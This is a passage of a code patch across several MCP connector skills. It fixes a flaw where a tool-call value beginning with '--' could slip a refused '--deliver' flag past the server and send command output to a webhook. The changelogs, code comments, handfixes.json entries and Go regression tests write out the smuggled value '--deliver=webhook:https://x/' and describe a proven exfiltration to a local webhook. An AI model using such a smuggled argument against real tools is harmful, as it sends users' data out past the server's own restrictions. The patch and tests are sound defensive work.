+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/threatlocker/handfixes.json
+++ b/skills/threatlocker/handfixes.json
@@ -530,8 +530,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -541,7 +553,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/unifi-network/CHANGELOG.md
+++ b/skills/unifi-network/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-09-01
 
 ### Fixed

--- a/skills/unifi-network/CHANGELOG.md
+++ b/skills/unifi-network/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01
 

--- a/skills/unifi-network/CHANGELOG.md
+++ b/skills/unifi-network/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01

--- a/skills/unifi-network/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/unifi-network/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/unifi-network/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/unifi-network/cli/internal/mcp/cobratree/shellout.go
@@ -345,6 +345,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -354,10 +361,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -365,11 +372,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/unifi-network/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/unifi-network/cli/internal/mcp/cobratree/shellout_test.go
@@ -89,7 +89,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -118,7 +118,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -174,7 +174,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -392,7 +392,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -831,4 +831,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/unifi-network/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/unifi-network/cli/internal/mcp/cobratree/shellout_test.go
@@ -892,15 +892,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/unifi-network/handfixes.json
+++ b/skills/unifi-network/handfixes.json
@@ -363,6 +363,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/unifi-network/handfixes.json
+++ b/skills/unifi-network/handfixes.json
@@ -378,8 +378,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -389,7 +401,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/veeam/CHANGELOG.md
+++ b/skills/veeam/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/veeam/CHANGELOG.md
+++ b/skills/veeam/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/veeam/CHANGELOG.md
+++ b/skills/veeam/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/veeam/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/veeam/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/veeam/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/veeam/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/veeam/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/veeam/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/veeam/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/veeam/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/veeam/handfixes.json
+++ b/skills/veeam/handfixes.json
@@ -221,6 +221,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/veeam/handfixes.json
+++ b/skills/veeam/handfixes.json
@@ -236,8 +236,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -247,7 +259,14 @@
     {
